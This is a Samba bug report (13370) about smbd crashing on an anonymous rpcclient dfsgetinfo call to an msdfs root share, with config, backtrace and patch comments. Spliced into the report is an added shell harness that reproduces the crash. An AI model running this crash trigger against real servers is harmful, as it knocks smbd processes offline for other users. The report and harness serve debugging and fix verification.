Bug 13370 - dfsgetinfo dumps core
Summary: dfsgetinfo dumps core
Alias: None
Product: Samba 4.1 and newer
Classification: Unclassified
Component: File services
Version: 4.6.2
Hardware: All All
Importance: P5 normal
Target Milestone: ---
Assignee: Karolin Seeger
QA Contact: Samba QA Contact
Reported: 2018-04-06 14:59 UTC by Heinrich Mislik
Modified: 2018-04-25 06:45 UTC
CC List: 1 user


Attachments:
Fix (4.10 KB, text/plain), 2018-04-11 08:45 UTC, Volker Lendecke, no flags
Patch for 4.8 and 4.7 (4.34 KB, patch), 2018-04-12 11:58 UTC, Volker Lendecke, metze: review+

Description Heinrich Mislik 2018-04-06 14:59:57 UTC
In function get_referred_path, tsocket_address_copy gets called with a NULL pointer, resulting in a core dump. Tested on RHEL7 with samba-4.6.2-12.el7_4.x86_64.

smb.conf is (global settings and the dfsshare share, the share name being the one used in the commands below):

[global]
netbios name = somehost
panic action = /bin/sleep 999999

[dfsshare]
msdfs root = yes
path = /tmp/dfsshare

symlink looks like this:

lrwxrwxrwx 1 root root 41 Apr  6 16:07 /tmp/dfsshare/someshare -> msdfs:someotherhost.example.com/someshare

dfsreferral works as expected:

# smbclient //somehost.example.com/dfsshare/someshare -U % -c showconnect
OS=[Windows 6.1] Server=[Samba 4.6.2]

dfsgetinfo results in a core dump of smbd:

# rpcclient somehost.example.com -U % -c 'dfsgetinfo \\\\somehost\\dfsshare\\someshare somehost someshare'

The backtrace shows addr=0x0 in the call to _tsocket_address_copy:

#0  0x00007efca982edbc in waitpid () from /lib64/libc.so.6
#1  0x00007efca97b1cc2 in do_system () from /lib64/libc.so.6
#2  0x00007efcab11c7e1 in smb_panic_s3 (why=<optimized out>) at ../source3/lib/util.c:804
#3  0x00007efcad1f795f in smb_panic (why=why@entry=0x7efcad23f82a "internal error")
    at ../lib/util/fault.c:166
#4  0x00007efcad1f7b76 in fault_report (sig=<optimized out>) at ../lib/util/fault.c:83
#5  sig_fault (sig=<optimized out>) at ../lib/util/fault.c:94
#6  <signal handler called>
#7  _tsocket_address_copy (addr=0x0, mem_ctx=0x561bb5c3f470, 
    location=0x7efcacef5903 "../source3/smbd/msdfs.c:1091") at ../lib/tsocket/tsocket.c:96
#8  0x00007efcacdabb47 in get_referred_path (ctx=ctx@entry=0x561bb5c3e600, 
    dfs_path=0x561bb5c3e8b0 "\\\\somehost\\dfsshare\\someshare", remote_address=<optimized out>, 
    local_address=0x0, allow_broken_path=allow_broken_path@entry=true, 
    jucn=jucn@entry=0x561bb5c3eed0, consumedcntp=consumedcntp@entry=0x7ffe762d315c, 
    self_referralp=self_referralp@entry=0x7ffe762d315b) at ../source3/smbd/msdfs.c:1091
#9  0x00007efcacce5e1f in _dfs_GetInfo (p=p@entry=0x561bb5c3da60, r=r@entry=0x561bb5c3e660)
    at ../source3/rpc_server/dfs/srv_dfs_nt.c:380
#10 0x00007efcacce8bb4 in api_dfs_GetInfo (p=0x561bb5c3da60)
    at default/librpc/gen_ndr/srv_dfs.c:351
#11 0x00007efcace32f22 in api_rpcTNP (p=p@entry=0x561bb5c3da60, pkt=pkt@entry=0x561bb5c37d70, 
    api_rpc_cmds=<optimized out>, n_cmds=23, syntax=syntax@entry=0x561bb5c3d480)
    at ../source3/rpc_server/srv_pipe.c:1476
#12 0x00007efcace3524c in api_pipe_request (pkt=0x561bb5c37d70, p=0x561bb5c3da60)
    at ../source3/rpc_server/srv_pipe.c:1411
#13 process_request_pdu (pkt=0x561bb5c37d70, p=0x561bb5c3da60)
    at ../source3/rpc_server/srv_pipe.c:1680
#14 process_complete_pdu (p=0x561bb5c3da60, pkt=0x561bb5c37d70)
    at ../source3/rpc_server/srv_pipe.c:1698
#15 0x00007efcaccf3a4d in named_pipe_packet_process (subreq=<optimized out>)
    at ../source3/rpc_server/rpc_server.c:439
#16 0x00007efca5771397 in dcerpc_read_ncacn_packet_done (subreq=0x561bb5c37e80)
    at ../librpc/rpc/dcerpc_util.c:835
#17 0x00007efcaacc50c9 in tstream_readv_pdu_readv_done (subreq=0x561bb5c30ed0)
    at ../lib/tsocket/tsocket_helpers.c:319
#18 0x00007efcaacc3fab in tstream_readv_done (subreq=0x561bb5c311f0)
    at ../lib/tsocket/tsocket.c:604
#19 0x00007efca9b38aba in tevent_common_loop_immediate () from /lib64/libtevent.so.0
#20 0x00007efca9b3dc9d in epoll_event_loop_once () from /lib64/libtevent.so.0
#21 0x00007efca9b3c2a7 in std_event_loop_once () from /lib64/libtevent.so.0
#22 0x00007efca9b380cd in _tevent_loop_once () from /lib64/libtevent.so.0
#23 0x00007efca9b382fb in tevent_common_loop_wait () from /lib64/libtevent.so.0
#24 0x00007efca9b3c247 in std_event_loop_wait () from /lib64/libtevent.so.0
#25 0x00007efcacda4fb4 in smbd_process (ev_ctx=ev_ctx@entry=0x561bb5c15910, 
    msg_ctx=msg_ctx@entry=0x561bb5c15d40, sock_fd=sock_fd@entry=41, 
    interactive=interactive@entry=false) at ../source3/smbd/process.c:4126
#26 0x0000561bb40caa74 in smbd_accept_connection (ev=0x561bb5c15910, fde=<optimized out>, 
    flags=<optimized out>, private_data=<optimized out>) at ../source3/smbd/server.c:1017
#27 0x00007efca9b3dedb in epoll_event_loop_once () from /lib64/libtevent.so.0
#28 0x00007efca9b3c2a7 in std_event_loop_once () from /lib64/libtevent.so.0
#29 0x00007efca9b380cd in _tevent_loop_once () from /lib64/libtevent.so.0
#30 0x00007efca9b382fb in tevent_common_loop_wait () from /lib64/libtevent.so.0
#31 0x00007efca9b3c247 in std_event_loop_wait () from /lib64/libtevent.so.0
#32 0x0000561bb40c5a95 in smbd_parent_loop (parent=<optimized out>, ev_ctx=0x561bb5c15910)
    at ../source3/smbd/server.c:1384
#33 main (argc=<optimized out>, argv=<optimized out>) at ../source3/smbd/server.c:2038


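The reporter's setup, turned into a reproduction harness. This is an added example and not part of the bug report or of Samba's own code; the host, share and link names mirror the report, and the presence of rpcclient on the test machine is an assumption. The probe sends exactly the dfsgetinfo call from the report, so against an unpatched smbd it kills the serving smbd child (the panic action then keeps it around for a debugger); run it only against a test server.

```shell
#!/bin/sh
# Reproduction harness for Samba bug 13370: dfsgetinfo against an msdfs root
# share whose referral path is resolved with a NULL local address.
# Added example, not from the bug report; names below are assumptions.
set -u

# Write a minimal smb.conf with one msdfs root share into scratch dir $1.
# "panic action" keeps a crashed smbd child alive so gdb can attach to it,
# as in the reporter's configuration. Prints the config path.
write_dfs_config() {
    dir=$1
    mkdir -p "$dir/dfsshare"
    cat > "$dir/smb.conf" <<EOF
[global]
    netbios name = somehost
    panic action = /bin/sleep 999999

[dfsshare]
    path = $dir/dfsshare
    msdfs root = yes
EOF
    printf '%s\n' "$dir/smb.conf"
}

# Create the referral symlink <name> -> msdfs:<host>/<share> inside the
# share and print the link target that smbd will parse.
make_dfs_link() {
    dir=$1; name=$2; target_host=$3; target_share=$4
    ln -sfn "msdfs:${target_host}/${target_share}" "$dir/dfsshare/$name"
    readlink "$dir/dfsshare/$name"
}

# Return 0 if a symlink target has the msdfs:host/share shape smbd treats
# as a DFS referral, 1 otherwise (a plain symlink is served as a file).
dfs_link_is_valid() {
    case "$1" in
        msdfs:*/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Run the crashing call as an anonymous user (-U %) against server $1.
# The UNC path is passed through the shell so rpcclient receives
# \\\\netbios\\share\\link, exactly as typed in the report.
# Returns 0 if rpcclient got an answer, 1 if the RPC failed or the
# connection dropped (what a panicking smbd looks like from the client),
# 2 if rpcclient is not installed here.
dfsgetinfo_probe() {
    server=$1; netbios=$2; share=$3; link=$4
    command -v rpcclient >/dev/null 2>&1 || return 2
    rpcclient "$server" -U % \
        -c "dfsgetinfo \\\\\\\\${netbios}\\\\${share}\\\\${link} ${netbios} ${link}" \
        >/dev/null 2>&1 && return 0
    return 1
}

# Stand-alone usage: build the share layout, then probe if rpcclient exists.
if [ "${1:-}" = "run" ]; then
    scratch=$(mktemp -d)
    cfg=$(write_dfs_config "$scratch")
    target=$(make_dfs_link "$scratch" someshare someotherhost.example.com someshare)
    dfs_link_is_valid "$target" || { echo "bad referral link: $target" >&2; exit 1; }
    echo "config: $cfg  link: $target"
    echo "start smbd with: smbd -F -s $cfg   (test host only)"
    dfsgetinfo_probe somehost.example.com somehost dfsshare someshare
    echo "probe exit status: $?  (1 means the server dropped the call)"
fi
```

A probe status of 1 alone does not prove the panic; confirm it with the panic action (a lingering `/bin/sleep 999999` child of smbd) or the "internal error" line in the smbd log.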
Comment 1 Volker Lendecke 2018-04-11 08:45:35 UTC
Created attachment 14121

The attached patch (for master) fixes it for me.
Comment 2 Volker Lendecke 2018-04-12 11:58:55 UTC
Created attachment 14126
Patch for 4.8 and 4.7

Patch cherry-picked from master, applies and builds in 4.8 and 4.7
Comment 3 Karolin Seeger 2018-04-19 09:37:34 UTC
(In reply to Volker Lendecke from comment #2)
Pushed to autobuild-v4-[8,7]-test.
Comment 4 Karolin Seeger 2018-04-25 06:45:09 UTC
(In reply to Karolin Seeger from comment #3)
Pushed to both branches.
Closing out bug report.